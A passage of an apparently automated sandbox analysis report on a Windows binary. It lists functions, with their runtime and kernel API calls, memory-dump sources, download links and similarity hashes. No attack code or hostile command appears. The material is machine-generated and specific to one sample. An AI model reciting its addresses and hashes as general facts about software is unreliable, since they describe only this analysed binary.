                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A33E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1432973188-0
                                                                                                                        • Opcode ID: 513b045bd5d977dfe80e25a0a9e41211161571cc39ed78a84d69232520f86582
                                                                                                                        • Instruction ID: c69044fcc06c6c2d78e20d22f4d4effe7338ccd1a74ded6e4d271befcf7ba498
                                                                                                                        • Opcode Fuzzy Hash: 513b045bd5d977dfe80e25a0a9e41211161571cc39ed78a84d69232520f86582
                                                                                                                        • Instruction Fuzzy Hash: B5F04F7760462E7FEA108A6A8C84F67B7ADEB86BB5F100229FA24D31C0D660EC154671
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 005430B4, Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,005406A9,00539730,00000001,00542E13,?,00000000,00000000,?,?,005343D6,00542F25,?,005343D6,?), ref: 005430B6
                                                                                                                          • Part of subcall function 00542F6D: TlsGetValue.KERNEL32(00000000,005430C9,?,?,005343D6,00542F25,?,005343D6,?), ref: 00542F74
                                                                                                                          • Part of subcall function 00542F6D: TlsSetValue.KERNEL32(00000000,?,005343D6,00542F25,?,005343D6,?), ref: 00542F95
                                                                                                                        • __calloc_crt.LIBCMT ref: 005430D8
                                                                                                                          • Part of subcall function 00540F7C: __calloc_impl.LIBCMT ref: 00540F8A
                                                                                                                          • Part of subcall function 00540F7C: Sleep.KERNEL32(00000000,?,005343D6,?), ref: 00540FA1
                                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000002,00542086,00537225,005343D6,?,005343D6,?), ref: 00542EE8
                                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000005,?,005343D6,?), ref: 00542EFF
                                                                                                                          • Part of subcall function 00542FF5: GetModuleHandleA.KERNEL32(KERNEL32.DLL,007D5B80,0000000C,00543106,00000000,00000000,?,?,005343D6,00542F25,?,005343D6,?), ref: 00543006
                                                                                                                          • Part of subcall function 00542FF5: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0054303A
                                                                                                                          • Part of subcall function 00542FF5: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0054304A
                                                                                                                          • Part of subcall function 00542FF5: InterlockedIncrement.KERNEL32(00810930), ref: 0054306C
                                                                                                                          • Part of subcall function 00542FF5: __lock.LIBCMT ref: 00543074
                                                                                                                          • Part of subcall function 00542FF5: ___addlocaleref.LIBCMT ref: 00543093
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00543108
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,005343D6,00542F25,?,005343D6,?), ref: 00543120
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1081334783-0
                                                                                                                        • Opcode ID: 53b845ae17de35decfdb8c4374abd41db695b43b3d35d843e2d459e64a5967bf
                                                                                                                        • Instruction ID: 8c9bd9032edc723ec5a1734115c697f610c33a85ea35646c2feb52735e1e513e
                                                                                                                        • Opcode Fuzzy Hash: 53b845ae17de35decfdb8c4374abd41db695b43b3d35d843e2d459e64a5967bf
                                                                                                                        • Instruction Fuzzy Hash: 72F028325042236BD7323778AC0F6DA3E64FF897B1F204219F514961E1DF25C942CAD4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004A1957, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A195E
                                                                                                                        • InitializeCriticalSection.KERNEL32(?,00000004,004A3321,00000000,00000000,?,?,?,?,?,00000008,004BB0FD,?,00000000), ref: 004A1973
                                                                                                                        • _strlen.LIBCMT ref: 004A198C
                                                                                                                        • _mbstowcs.LIBCMT ref: 004A19A7
                                                                                                                          • Part of subcall function 0053A4FD: __mbstowcs_l_helper.LIBCMT ref: 0053A51B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalH_prolog3InitializeSection__mbstowcs_l_helper_mbstowcs_strlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4276943295-0
                                                                                                                        • Opcode ID: e1ec9e72b8bbf77ae98ff7c270c0279c6940fb37f2a6573085775b3e33ba502f
                                                                                                                        • Instruction ID: 3ac07268216910a4535ea5e05e968f667f3b62dd9118136c005e3060a1736e2e
                                                                                                                        • Opcode Fuzzy Hash: e1ec9e72b8bbf77ae98ff7c270c0279c6940fb37f2a6573085775b3e33ba502f
                                                                                                                        • Instruction Fuzzy Hash: 7FF0F671801607AFDB11EF20C8097AEBF71BF41322F008216F5548B391CB748A14DBD5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0059F229, Relevance: 6.0, APIs: 4, Instructions: 30threadsynchronizationwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0059F243
                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF,000000FF,?,?,0059F6FB), ref: 0059F24E
                                                                                                                        • GetExitCodeThread.KERNEL32(000000FF,?,00000000,?,?,0059F6FB), ref: 0059F25E
                                                                                                                        • CloseHandle.KERNEL32(000000FF,?,?,0059F6FB), ref: 0059F26A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CloseCodeExitHandleMessageObjectPostSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2249347992-0
                                                                                                                        • Opcode ID: bcbefdc3c0108b0a80f65901d016e7a7df404a622904fa56ba2ee180f0e4ac29
                                                                                                                        • Instruction ID: 470dcaf36edad1e74e6c5957a2666f90a18739aaa67dbec05905e8c206957b1c
                                                                                                                        • Opcode Fuzzy Hash: bcbefdc3c0108b0a80f65901d016e7a7df404a622904fa56ba2ee180f0e4ac29
                                                                                                                        • Instruction Fuzzy Hash: 81F03A36000B44FFEB314B69DC0995ABFB5FB89722B144728F1E6914F0D730AA52DB14
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B5A51, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B5A58
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004B5A8E
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: map/set<T> too long
                                                                                                                        • API String ID: 1961742612-1285458680
                                                                                                                        • Opcode ID: 7f0f6be1992fc2415de07e84cb9a67faecded051de283232d2e5f74209d034bb
                                                                                                                        • Instruction ID: 2c3c54ada47b0557a3203b3a0dce35e00f3b020d822c1e53a3ccc12e6038366d
                                                                                                                        • Opcode Fuzzy Hash: 7f0f6be1992fc2415de07e84cb9a67faecded051de283232d2e5f74209d034bb
                                                                                                                        • Instruction Fuzzy Hash: 67416970600641AFCB11DF58C5C4BAAFBE1BF09304F59829AE8596B792C778FC41CBA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004C0ABF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C0AC6
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004C0AFC
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: map/set<T> too long
                                                                                                                        • API String ID: 1961742612-1285458680
                                                                                                                        • Opcode ID: ea35f79c126089068ddd81563cfa06c97152ab47e051ba524bfff92fb07b3709
                                                                                                                        • Instruction ID: 01858b13b2e580b50971de02b404033cfd795de5fb4d2ace235499cff564d67e
                                                                                                                        • Opcode Fuzzy Hash: ea35f79c126089068ddd81563cfa06c97152ab47e051ba524bfff92fb07b3709
                                                                                                                        • Instruction Fuzzy Hash: EB416478600140DFCB51DF99C684FA9BBE1AF09308F49908EE5599B3A2D778FC81CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BCBD6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BCBDD
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004BCC13
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: map/set<T> too long
                                                                                                                        • API String ID: 1961742612-1285458680
                                                                                                                        • Opcode ID: d8dd8d571e7b53f6ff0dad84b1d011d535eb389e8d9576c839ab9a2559a31881
                                                                                                                        • Instruction ID: d98343a05744513c7fc1dfe10d33a5f6dd3184023bbfae2b6eb9a14603713a8c
                                                                                                                        • Opcode Fuzzy Hash: d8dd8d571e7b53f6ff0dad84b1d011d535eb389e8d9576c839ab9a2559a31881
                                                                                                                        • Instruction Fuzzy Hash: AF4148706002419FC725DF58C1C8AA6BFF1BF19304F19819AE5499B352C779FC41CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BF1C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BF1C9
                                                                                                                          • Part of subcall function 004A2712: __EH_prolog3.LIBCMT ref: 004A2719
                                                                                                                          • Part of subcall function 004A2712: EnterCriticalSection.KERNEL32(?,0000004C,004BF2D2, NI,00000001,00833EB8,0000002C,004BDD2C), ref: 004A2727
                                                                                                                          • Part of subcall function 004A2712: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 004A27DE
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$EnterInitializeLeave
                                                                                                                        • String ID: NI$ QS
                                                                                                                        • API String ID: 3061355161-1958716692
                                                                                                                        • Opcode ID: 0cdb80b1bc79fbf0d48a8cf9024e578286f06820a8ab9b33db6636cf4bd1a510
                                                                                                                        • Instruction ID: 851df7f533dbb76401c13edf793070be194cb0c7cad1b6d438316afebe21b6e0
                                                                                                                        • Opcode Fuzzy Hash: 0cdb80b1bc79fbf0d48a8cf9024e578286f06820a8ab9b33db6636cf4bd1a510
                                                                                                                        • Instruction Fuzzy Hash: A23114B5E01609BADB08DFA0CD529EFBB38FF51344F00406EB50666241D7795F05DBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0050251E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00502525
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004E91D9: __EH_prolog3.LIBCMT ref: 004E91E0
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,WaitingThread.new ConnectionThread.Failed , LE=,00000000), ref: 005025DB
                                                                                                                          • Part of subcall function 004C47CD: __EH_prolog3.LIBCMT ref: 004C47D4
                                                                                                                          • Part of subcall function 004E9FA6: __EH_prolog3.LIBCMT ref: 004E9FAD
                                                                                                                          • Part of subcall function 004E9FA6: CreateThread.KERNEL32 ref: 004E9FDD
                                                                                                                        Strings
                                                                                                                        • WaitingThread.new ConnectionThread.Failed , LE=, xrefs: 005025C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CreateCriticalErrorInitializeLastSectionThread
                                                                                                                        • String ID: WaitingThread.new ConnectionThread.Failed , LE=
                                                                                                                        • API String ID: 628715854-23746943
                                                                                                                        • Opcode ID: 9ed26476f62b07c2b07d2491cfbfe6beca7cd47acc766257e1607c8c2e544eb2
                                                                                                                        • Instruction ID: 81e4dc0dad3a249792ff11a13af2a53550af703f3c5101841e93d9e9b8aec9e5
                                                                                                                        • Opcode Fuzzy Hash: 9ed26476f62b07c2b07d2491cfbfe6beca7cd47acc766257e1607c8c2e544eb2
                                                                                                                        • Instruction Fuzzy Hash: 4431F4B0D00248EEEB05EBA5C85BAEEBF78AF55308F10425EF111671D2DB781E44C766
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00503540, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00503547
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
